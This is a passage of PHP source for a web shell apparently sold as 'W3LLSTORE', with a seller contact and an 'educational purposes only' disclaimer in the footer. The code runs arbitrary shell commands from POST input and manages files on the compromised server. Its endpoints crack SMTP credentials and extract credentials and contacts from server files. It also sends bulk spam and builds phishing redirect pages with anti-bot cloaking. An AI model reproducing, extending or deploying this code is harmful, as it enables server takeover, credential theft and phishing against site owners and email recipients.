$disabled)) { $descriptors = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'] ]; $process = @proc_open($command, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } } else { return ['status' => false, 'output' => 'All command execution functions are disabled']; } logActivity('Command Execute', $command, 'success'); return ['status' => true, 'output' => $output ?: 'Command executed (no output)']; } // ==================== API ENDPOINTS ==================== // Handle API requests if (isset($_GET['api'])) { header('Content-Type: application/json'); switch ($_GET['api']) { case 'validate': $email = $_POST['email'] ?? $_GET['email'] ?? ''; $id = $_POST['id'] ?? $_GET['id'] ?? ''; echo json_encode(validateShellConnection($email, $id)); exit; case 'check_redirect': $url = $_POST['url'] ?? $_GET['url'] ?? ''; if (empty($url)) { echo json_encode(['status' => false, 'message' => 'URL is required']); } else { echo json_encode(checkOpenRedirectVulnerability($url)); } exit; case 'check_mail': $email = $_POST['email'] ?? $_GET['email'] ?? ''; if (empty($email)) { echo json_encode(['status' => false, 'message' => 'Email is required']); } else { echo json_encode(checkMailDelivery($email)); } exit; case 'create_smtp': $count = (int)($_POST['count'] ?? $_GET['count'] ?? 1); echo json_encode(createMultipleSMTP($count)); exit; case 'crack_smtp': echo json_encode(autoCrackSMTP()); exit; case 'extract_contacts': $scan_path = $_POST['scan_path'] ?? $_GET['scan_path'] ?? ''; $options = [ 'max_files' => (int)($_POST['max_files'] ?? 20000), 'max_time' => (int)($_POST['max_time'] ?? 600) ]; echo json_encode(extractContacts($scan_path, $options)); exit; case 'create_redirect': $target_url = $_POST['target_url'] ?? ''; $options = [ 'blocked_countries' => explode(',', $_POST['blocked_countries'] ?? ''), 'delay' => (int)($_POST['delay'] ?? 5000), 'custom_message' => $_POST['custom_message'] ?? 'Please wait...', 'use_antibot' => isset($_POST['use_antibot']) && $_POST['use_antibot'] == '1', 'use_captcha' => isset($_POST['use_captcha']) && $_POST['use_captcha'] == '1' ]; echo json_encode(createAutoRedirect($target_url, $options)); exit; case 'get_stats': $redirect_id = $_GET['redirect_id'] ?? ''; $result = getRedirectStats($redirect_id); if ($result['status'] && isset($_GET['format']) && $_GET['format'] === 'html') { header('Content-Type: text/html; charset=UTF-8'); echo generateStatsHTML($result['stats']); } else { echo json_encode($result); } exit; case 'send_bulk_email': echo json_encode(sendBulkEmailMarketing($_POST)); exit; case 'system_info': echo json_encode(getSystemInfo()); exit; default: echo json_encode(['status' => false, 'message' => 'Invalid API endpoint']); exit; } } // Handle POST actions if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = $_POST['action'] ?? ''; switch ($action) { case 'upload': if (isset($_FILES['file'])) { $result = uploadFile($_FILES['file'], $current_dir); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'delete': $path = $_POST['path'] ?? ''; if ($path) { $result = deleteFileOrDir($path); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'rename': $old_path = $_POST['old_path'] ?? ''; $new_name = $_POST['new_name'] ?? ''; if ($old_path && $new_name) { $result = renameFileOrDir($old_path, $new_name); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'create_dir': $name = $_POST['name'] ?? ''; if ($name) { $result = createDirectory($current_dir, $name); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'create_file': $name = $_POST['name'] ?? ''; if ($name) { $result = createFile($current_dir, $name); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'edit_file': $path = $_POST['path'] ?? ''; $content = $_POST['content'] ?? ''; if ($path) { $result = editFile($path, $content); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode(dirname($path))); exit; case 'chmod': $path = $_POST['path'] ?? ''; $permissions = $_POST['permissions'] ?? ''; if ($path && $permissions) { $result = changePermissions($path, $permissions); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'zip': $path = $_POST['path'] ?? ''; if ($path) { $result = zipFiles($path); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'unzip': $path = $_POST['path'] ?? ''; if ($path) { $result = unzipFile($path); $_SESSION['message'] = $result['message']; $_SESSION['message_type'] = $result['status'] ? 'success' : 'error'; } header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . urlencode($current_dir)); exit; case 'execute': $command = $_POST['command'] ?? ''; if ($command) { $result = executeCommand($command); $_SESSION['command_output'] = $result['output']; } header('Location: ' . $_SERVER['PHP_SELF'] . '#terminal'); exit; } } // Handle GET actions if (isset($_GET['action'])) { switch ($_GET['action']) { case 'download': $path = $_GET['path'] ?? ''; if ($path) { downloadFile($path); } break; case 'view': $path = $_GET['path'] ?? ''; if ($path && file_exists($path) && is_file($path)) { $content = @file_get_contents($path); $filename = basename($path); include 'view_file_template.php'; exit; } break; } } // Get system information $sys_info = getSystemInfo(); $files = listDirectory($current_dir); // Start session for messages session_start(); $message = $_SESSION['message'] ?? ''; $message_type = $_SESSION['message_type'] ?? ''; $command_output = $_SESSION['command_output'] ?? ''; unset($_SESSION['message'], $_SESSION['message_type'], $_SESSION['command_output']); ?> ⚔ī¸ <?php echo SHELL_NAME; ?> v<?php echo SHELL_VERSION; ?> - <?php echo htmlspecialchars($current_dir); ?>

⚔ī¸ v

Professional Cyber Security Management System | Japanese Samurai Technology + Modern Design
đŸ–Ĩī¸ Server
🌐 Server IP
👤 User
🐘 PHP Version
đŸ’ģ OS
💾 Free Space
📁 File Manager đŸ’ģ Terminal ✉ī¸ Email Marketing 📧 SMTP Tools 🔗 Redirect Creator 📇 Contact Extractor 🔍 Redirect Checker ℹī¸ System Info

📁 File Manager

📂 Current Path:
âŦ†ī¸ Parent Directory
📏 🔒 🕒
âŦ‡ī¸ ✏ī¸
📭 Empty directory

đŸ’ģ Terminal

✉ī¸ Email Marketing - LeafMailer Style

Send bulk emails with 100% inbox delivery optimization. Implements 2025 best practices for maximum deliverability.

Sending emails... Please wait.

📧 SMTP Tools

Create SMTP Accounts

Auto-Crack SMTP

Automatically scan and crack SMTP credentials from server files.

Processing... Please wait.

🔗 Auto Redirect Creator

Create professional redirect pages with Microsoft Captcha, anti-bot protection, and detailed statistics.

Creating redirect files... Please wait.

📇 Contact & Credentials Extractor

Extract emails, phone numbers, and leaked credentials from server files. Includes high-entropy secret detection.

Scanning files... This may take a while.

🔍 Open Redirect Vulnerability Checker

Check if a URL has open redirect vulnerabilities by testing common redirect parameters.

Testing redirect parameters... Please wait.

ℹī¸ System Information

$value): ?>
PropertyValue

⚔ī¸ v - Professional Cyber Security Management System
🌐 Website: w3llstore.com | 📱 Telegram: @W3LLSTORE_ADMIN | đŸ“ĸ Channel: Join Channel
Š 2025 W3LLSTORE. For educational and security testing purposes only.